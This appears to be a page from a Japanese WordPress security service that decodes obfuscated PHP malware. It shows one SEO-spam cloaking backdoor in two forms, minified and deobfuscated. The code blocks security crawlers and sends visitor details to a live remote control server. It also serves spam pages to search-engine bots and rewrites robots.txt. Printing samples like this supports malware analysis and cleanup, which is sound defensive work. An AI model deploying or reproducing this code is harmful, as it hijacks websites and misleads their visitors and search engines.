Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php error_reporting(0);function getrealIp(){if (getenv('HTTP_CLIENT_IP')) {$ip = getenv('HTTP_CLIENT_IP');}if (getenv('HTTP_X_REAL_IP')) {$ip = getenv('HTTP_X_REAL_IP');} elseif (getenv('HTTP_X_FORWARDED_FOR')) {$ip = getenv('HTTP_X_FORWARDED_FOR');$ips = explode(',', $ip);$ip = $ips[0];} elseif (getenv('REMOTE_ADDR')) {$ip = getenv('REMOTE_ADDR');} else {$ip = '0.0.0.0';}return $ip;}function get_url($url){$remoteContent = @file_get_contents($url);if(empty($remoteContent)){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);if(strpos($url,"https://") !== false){curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);}$remoteContent = curl_exec($ch);curl_close($ch);}return $remoteContent;}if(preg_match("/(Bytespider|PetalBot|AhrefsBot|Barkrowler|MJ12bot|FeedDemon|JikeSpider|Indy Library|AskTbFXTV|CrawlDaddy|CoolpadWebkit|Java|Feedly|UniversalFeedParser|ApacheBench|Swiftbot|ZmEu|oBot|jaunty|Python-urllib|python-requests|lightDeckReports Bot|YYSpider|DigExt|YisouSpider|HttpClient|heritrix|EasouSpider|Ezooms|AmazonBot|SEMrushBot|YandexBot|paloaltonetworks|Python)/i", $_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 403 Forbidden');exit();}$botagent = "bing|google|yahoo";$datacenter = "http://cw375.alivewant.shop/index.php";$pc = "VgEAVQt";$useragent = urlencode($_SERVER['HTTP_USER_AGENT']);$refer = urlencode($_SERVER['HTTP_REFERER']);$language = urlencode($_SERVER['HTTP_ACCEPT_LANGUAGE']);$realip = getrealIp();$ip = urlencode($realip);$domain = urlencode($_SERVER['HTTP_HOST']);$script = urlencode($_SERVER['SCRIPT_NAME']);if ( (! empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (! empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (! empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') ) {$_SERVER['REQUEST_SCHEME'] = 'https';} else {$_SERVER['REQUEST_SCHEME'] = 'http';}$http = urlencode($_SERVER['REQUEST_SCHEME']);$uri = urlencode($_SERVER['REQUEST_URI']);if(strpos($uri,"uuuuxxxxooo") !== false){echo "ok";exit();}if($realip == "153.246.135.238" || $realip == "219.101.44.233"){header('HTTP/1.0 403 Forbidden');exit();}$rewriteable = 0;if(!file_exists("uxo.txt")){$uuu = $http.'://'.$_SERVER['HTTP_HOST'].'/uuuuxxxxooo';$dd = get_url($uuu);if($dd == "ok"){$rewriteable = 1;@file_put_contents("uxo.txt","1");}else{$rewriteable = 0;@file_put_contents("uxo.txt","0");}}else{$rewriteable = @file_get_contents("uxo.txt");}if(strpos($uri,"pingsitemap.xml") !== false){$scripname = $_SERVER['SCRIPT_NAME'];if( strpos( $scripname, "index.php") !== false){if($rewriteable == 0){$scripname = '/?';}else{$scripname = '/';}}else{$scripname = $scripname.'?';}$robots_contents = "User-agent: *\r\nAllow: /";$sitemap = "$http://" . $domain .$scripname. "sitemap.xml";$robots_contents = trim($robots_contents)."\r\n"."Sitemap: $sitemap";$sitemapstatus = "";echo $sitemap.": ".$sitemapstatus.'<br/>';$requsturl = $datacenter."?agent=$useragent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$rewriteable&script=$script&sitemap=".urlencode($sitemap);$dd = get_url($requsturl); @file_put_contents("robots.txt",$robots_contents);exit();}else if(strpos($uri,"favicon.ico") !== false){}else if(strpos($uri,"jp2023") !== false){$requsturl = $datacenter."?agent=$useragent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$rewriteable&script=$script";$dd = get_url($requsturl);echo $dd;exit();return;}else if(strpos($uri,"robots.txt") !== false || strpos($uri,"writerobots") !== false){$requsturl = $datacenter."?agent=$useragent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$rewriteable&script=$script";header('Content-Type: text/plain; charset=utf-8');echo $dd = get_url($requsturl);@file_put_contents("robots.txt",$dd);exit();}else if(preg_match("@^/(.*?).xml$@i", $_SERVER['REQUEST_URI'])){$requsturl = $datacenter."?agent=$useragent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$rewriteable&script=$script";$dd = get_url($requsturl);if($dd == "500"){header("HTTP/1.0 500 Internal Server Error");exit();}else{header('Content-Type: text/xml; charset=utf-8');echo $dd;exit();return;}}else if(preg_match("/($botagent)/i", $_SERVER['HTTP_USER_AGENT'])){$requsturl = $datacenter."?agent=$useragent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$rewriteable&script=$script";$dd = get_url($requsturl);if(!empty($dd)){if($dd == "500"){header("HTTP/1.0 500 Internal Server Error");exit();}if(substr($dd,0,5)=="<?xml"){header('Content-Type: text/xml; charset=utf-8');}else{header('Content-Type: text/html; charset=utf-8');}echo $dd;exit();return;}}else if(preg_match("/($botagent)/i", $_SERVER['HTTP_REFERER'])){$requsturl = $datacenter."?agent=$useragent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$rewriteable";$dd = get_url($requsturl);if($dd == "500"){header("HTTP/1.0 500 Internal Server Error");exit();}else if(!empty($dd)){header('HTTP/1.1 404 Not Found');echo $dd;exit();return;}}else{} ?>
<?php error_reporting(0); function getrealIp() { if (getenv('HTTP_CLIENT_IP')) { $ip = getenv('HTTP_CLIENT_IP'); } if (getenv('HTTP_X_REAL_IP')) { $ip = getenv('HTTP_X_REAL_IP'); } elseif (getenv('HTTP_X_FORWARDED_FOR')) { $ip = getenv('HTTP_X_FORWARDED_FOR'); $ips = explode(',', $ip); $ip = $ips[0]; } elseif (getenv('REMOTE_ADDR')) { $ip = getenv('REMOTE_ADDR'); } else { $ip = '0.0.0.0'; } return $ip; } function get_url($url) { $remoteContent = @file_get_contents($url); if (empty($remoteContent)) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); if (strpos($url, "https://") !== false) { curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); } $remoteContent = curl_exec($ch); curl_close($ch); } return $remoteContent; } if (preg_match("/(Bytespider|PetalBot|AhrefsBot|Barkrowler|MJ12bot|FeedDemon|JikeSpider|Indy Library|AskTbFXTV|CrawlDaddy|CoolpadWebkit|Java|Feedly|UniversalFeedParser|ApacheBench|Swiftbot|ZmEu|oBot|jaunty|Python-urllib|python-requests|lightDeckReports Bot|YYSpider|DigExt|YisouSpider|HttpClient|heritrix|EasouSpider|Ezooms|AmazonBot|SEMrushBot|YandexBot|paloaltonetworks|Python)/i", $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 403 Forbidden'); exit; } $botagent = "bing|google|yahoo"; $datacenter = "http://cw375.alivewant.shop/index.php"; $pc = "VgEAVQt"; $useragent = urlencode($_SERVER['HTTP_USER_AGENT']); $refer = urlencode($_SERVER['HTTP_REFERER']); $language = urlencode($_SERVER['HTTP_ACCEPT_LANGUAGE']); $realip = getrealIp(); $ip = urlencode($realip); $domain = urlencode($_SERVER['HTTP_HOST']); $script = urlencode($_SERVER['SCRIPT_NAME']); if (!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https' || !empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on' || !empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443' || isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') { $_SERVER['REQUEST_SCHEME'] = 'https'; } else { $_SERVER['REQUEST_SCHEME'] = 'http'; } $http = urlencode($_SERVER['REQUEST_SCHEME']); $uri = urlencode($_SERVER['REQUEST_URI']); if (strpos($uri, "uuuuxxxxooo") !== false) { echo "ok"; exit; } if ($realip == "153.246.135.238" || $realip == "219.101.44.233") { header('HTTP/1.0 403 Forbidden'); exit; } $rewriteable = 0; if (!file_exists("uxo.txt")) { $uuu = $http . '://' . $_SERVER['HTTP_HOST'] . '/uuuuxxxxooo'; $dd = get_url($uuu); if ($dd == "ok") { $rewriteable = 1; @file_put_contents("uxo.txt", "1"); } else { $rewriteable = 0; @file_put_contents("uxo.txt", "0"); } } else { $rewriteable = @file_get_contents("uxo.txt"); } if (strpos($uri, "pingsitemap.xml") !== false) { $scripname = $_SERVER['SCRIPT_NAME']; if (strpos($scripname, "index.php") !== false) { if ($rewriteable == 0) { $scripname = '/?'; } else { $scripname = '/'; } } else { $scripname .= '?'; } $robots_contents = "User-agent: *\r\nAllow: /"; $sitemap = "{$http}://" . $domain . $scripname . "sitemap.xml"; $robots_contents = trim($robots_contents) . "\r\n" . "Sitemap: {$sitemap}"; $sitemapstatus = ""; echo $sitemap . ": " . $sitemapstatus . '<br/>'; $requsturl = $datacenter . "?agent={$useragent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$rewriteable}&script={$script}&sitemap=" . urlencode($sitemap); $dd = get_url($requsturl); @file_put_contents("robots.txt", $robots_contents); exit; } else { if (strpos($uri, "favicon.ico") !== false) { } else { if (strpos($uri, "jp2023") !== false) { $requsturl = $datacenter . "?agent={$useragent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$rewriteable}&script={$script}"; $dd = get_url($requsturl); echo $dd; exit; } else { if (strpos($uri, "robots.txt") !== false || strpos($uri, "writerobots") !== false) { $requsturl = $datacenter . "?agent={$useragent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$rewriteable}&script={$script}"; header('Content-Type: text/plain; charset=utf-8'); echo $dd = get_url($requsturl); @file_put_contents("robots.txt", $dd); exit; } else { if (preg_match("@^/(.*?).xml\$@i", $_SERVER['REQUEST_URI'])) { $requsturl = $datacenter . "?agent={$useragent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$rewriteable}&script={$script}"; $dd = get_url($requsturl); if ($dd == "500") { header("HTTP/1.0 500 Internal Server Error"); exit; } else { header('Content-Type: text/xml; charset=utf-8'); echo $dd; exit; } } else { if (preg_match("/({$botagent})/i", $_SERVER['HTTP_USER_AGENT'])) { $requsturl = $datacenter . "?agent={$useragent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$rewriteable}&script={$script}"; $dd = get_url($requsturl); if (!empty($dd)) { if ($dd == "500") { header("HTTP/1.0 500 Internal Server Error"); exit; } if (substr($dd, 0, 5) == "<?php xml") { header('Content-Type: text/xml; charset=utf-8'); } else { header('Content-Type: text/html; charset=utf-8'); } echo $dd; exit; } } else { if (preg_match("/({$botagent})/i", $_SERVER['HTTP_REFERER'])) { $requsturl = $datacenter . "?agent={$useragent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$rewriteable}"; $dd = get_url($requsturl); if ($dd == "500") { header("HTTP/1.0 500 Internal Server Error"); exit; } else { if (!empty($dd)) { header('HTTP/1.1 404 Not Found'); echo $dd; exit; } } } else { } } } } } } }
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.